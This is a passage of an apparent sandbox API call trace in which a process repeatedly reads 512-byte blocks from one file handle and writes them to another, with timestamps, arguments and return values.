nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.777] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.777] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.778] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.778] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.779] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.779] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.780] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.780] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.781] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.781] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.782] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.782] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.783] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.783] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.784] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.784] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.785] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.785] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.786] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.786] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.787] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.787] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.788] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.789] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.789] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.790] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.791] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.791] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.791] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.792] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.792] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.793] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.793] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.794] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.794] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.795] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.795] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.796] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.796] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.797] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.797] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.798] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.798] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.799] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.799] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.800] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.800] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.801] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.801] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.802] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.802] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.802] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.803] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.803] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.804] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.805] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.805] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.806] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.806] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.806] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.807] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.807] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.808] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.808] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.809] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.809] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.810] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.810] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.811] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.811] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.812] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.812] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.813] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.813] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.814] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.814] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.815] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.815] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.816] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.816] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.817] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.817] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.818] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.818] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.819] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.819] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.820] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.820] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.821] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.821] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.822] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.822] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.823] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.823] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.824] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.824] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.825] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.825] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0020.826] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, 